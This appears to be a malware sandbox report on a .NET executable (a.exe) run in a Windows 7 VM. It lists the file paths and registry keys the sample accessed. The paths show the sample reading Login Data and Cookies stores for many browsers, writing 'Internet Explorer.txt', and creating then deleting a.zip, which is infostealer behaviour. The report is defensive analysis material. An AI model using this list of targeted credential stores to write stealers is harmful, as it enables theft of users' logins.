Seven01_64 Seven01_64 VirtualBox 2017-12-22 12:11:58 2017-12-22 12:14:54 176

8 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2017-12-22 12:11:58 2017-12-22 12:14:54 176

9 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\a.exe.config
C:\Users\Seven01\AppData\Local\Temp\a.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\a.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\a.config
C:\Users\Seven01\AppData\Local\Temp\a.INI
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_32\Newtonsoft.Json\6.0.0.0__30ad4fe6b2a6aeed
C:\Windows\assembly\GAC_MSIL\Newtonsoft.Json\6.0.0.0__30ad4fe6b2a6aeed
C:\Windows\assembly\GAC\Newtonsoft.Json\6.0.0.0__30ad4fe6b2a6aeed
C:\Users\Seven01\AppData\Local\Temp\Newtonsoft.Json.dll
C:\Users\Seven01\AppData\Local\Temp\Newtonsoft.Json\Newtonsoft.Json.dll
C:\Users\Seven01\AppData\Local\Temp\Newtonsoft.Json.exe
C:\Users\Seven01\AppData\Local\Temp\Newtonsoft.Json\Newtonsoft.Json.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\a.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\a.resources\a.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\a.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\a.resources\a.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\a.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\a.resources\a.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\a.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\a.resources\a.resources.exe
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly
C:\Windows\assembly\Desktop.ini
C:\Windows\Microsoft.NET\Framework\v2.0.50727\VERSION.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Users\Seven01\AppData\Local\Amigo\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Amigo\User Data\Default\Cookies
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Cookies
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Cookies
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Cookies
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Cookies
C:\Users\Seven01\AppData\Roaming\Maxthon3\Users\guest\Invalid_File
C:\Users\Seven01\AppData\Roaming\Maxthon3\Users\guest\Cookie\Cookie.dat
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Cookies
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Cookies
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Security\d9a485330ec2708456134e4a9712a4ab\System.Security.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.INI
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\*.txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@abmr[1].txt
C:\Windows\System32\tzres.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adform[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adnxs[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adscale[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@agkn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@atemda[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@casalemedia[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@creativecdn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@demdex[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@doubleclick[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@dpm.demdex[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@exelator[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ibillboard[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ih.adscale[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@liverail[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@mathtag[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@mythings[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@nexac[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@onetag-sys[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@onetag-sys[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@openx[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@pixel.rubiconproject[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@quantserve[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rfihub[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rlcdn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ru4[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rubiconproject[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tapad[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tim[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@track.adform[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tubemogul[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@uk-ox-d.openxadexchange[1].txt
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\1e85062785e286cd9eae9c26d2c61f73\System.Data.ni.dll
C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Users\Seven01\AppData\Roaming\Internet Explorer.txt
C:\Users\Seven01\AppData\Roaming\a.zip
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll
C:\Windows\Globalization\en.nlp
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2104.30069281
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2104.30069281
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2104.30069328

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\a.exe.config
C:\Users\Seven01\AppData\Local\Temp\a.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Security\d9a485330ec2708456134e4a9712a4ab\System.Security.ni.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@abmr[1].txt
C:\Windows\System32\tzres.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adform[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adnxs[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adscale[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@agkn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@atemda[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@casalemedia[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@creativecdn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@demdex[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@doubleclick[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@dpm.demdex[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@exelator[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ibillboard[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ih.adscale[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@liverail[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@mathtag[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@mythings[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@nexac[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@onetag-sys[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@onetag-sys[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@openx[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@pixel.rubiconproject[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@quantserve[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rfihub[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rlcdn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ru4[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rubiconproject[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tapad[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tim[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@track.adform[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tubemogul[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@uk-ox-d.openxadexchange[1].txt
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\1e85062785e286cd9eae9c26d2c61f73\System.Data.ni.dll
C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Users\Seven01\AppData\Roaming\a.zip
C:\Users\Seven01\AppData\Roaming\Internet Explorer.txt

Write Files

C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Internet Explorer.txt
C:\Users\Seven01\AppData\Roaming\a.zip

Delete Files

C:\Users\Seven01\AppData\Roaming\a.zip
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2104.30069281
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2104.30069281
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2104.30069328

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
